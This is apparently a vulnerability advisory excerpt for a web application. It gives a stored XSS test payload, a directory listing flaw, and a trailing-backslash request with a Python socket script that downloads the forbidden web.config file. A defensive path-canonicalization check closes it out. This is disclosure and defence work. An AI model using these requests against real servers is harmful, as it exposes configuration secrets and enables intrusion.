User-submitted data is not HTML-entity encoded before it is rendered.
Log in using the web client and submit a request with the summary set to <script>alert(0)</script>. Navigate to My History to see the result.
The contents of the root directory can be listed by using a specially crafted URL.
Configuration / Source Disclosure
Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename.
GET /web.config\ HTTP/1.1
import socket

host = 'TARGET_HOST'  # placeholder for the server under test
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# trailing backslash after the filename defeats the forbidden-file-type check
s.sendall(('GET /web.config\\ HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n').encode())
while True:
    response = s.recv(8192)
    if not response: break
    print(response.decode(errors='replace'))
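As an added defender-side example (not part of the advisory or the affected product), the following Python check canonicalizes the requested path before applying the forbidden-extension list, so the trailing-backslash request above is rejected. It goes beyond the page's case by also handling percent-encoded backslashes, dot segments and trailing dots; the extensions other than ascx and config are assumed.

```python
import posixpath
from urllib.parse import unquote

# Extensions the application intends to block. 'ascx' and 'config' come from
# the advisory; the others are assumed for illustration.
FORBIDDEN_EXTENSIONS = {"config", "ascx", "cs", "vb"}


def extension_of(name: str) -> str:
    """Lower-case extension of a file name, or '' if it has none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def naive_is_forbidden(request_path: str) -> bool:
    """Mirrors the flawed check: it looks only at the literal suffix of the raw
    request path, so 'web.config\\' yields the extension 'config\\' and passes."""
    return extension_of(request_path) in FORBIDDEN_EXTENSIONS


def canonicalize(request_path: str) -> str:
    """Reduce a request path to the file the server would actually open.

    - percent-decode twice to collapse double-encoded separators (%255C)
    - treat backslash as a separator, as the Windows file system does
    - collapse '.' and '..' segments and trailing separators
    - drop trailing dots and spaces, which NTFS ignores in file names
    """
    path = unquote(unquote(request_path)).replace("\\", "/")
    path = posixpath.normpath("/" + path.lstrip("/"))
    head, _, name = path.rpartition("/")
    return head + "/" + name.rstrip(". ")


def hardened_is_forbidden(request_path: str) -> bool:
    """Apply the extension check to the canonical file name, not the raw path."""
    name = canonicalize(request_path).rpartition("/")[2]
    return extension_of(name) in FORBIDDEN_EXTENSIONS


if __name__ == "__main__":
    # constructed probe paths, including the advisory's trailing-backslash form
    for probe in ["/web.config", "/web.config\\", "/web.config%5C",
                  "/Scripts/../web.config/.", "/app/Default.ascx.", "/Scripts/app.js"]:
        print(f"{probe:28s} naive={naive_is_forbidden(probe)!s:5s} "
              f"hardened={hardened_is_forbidden(probe)}")
```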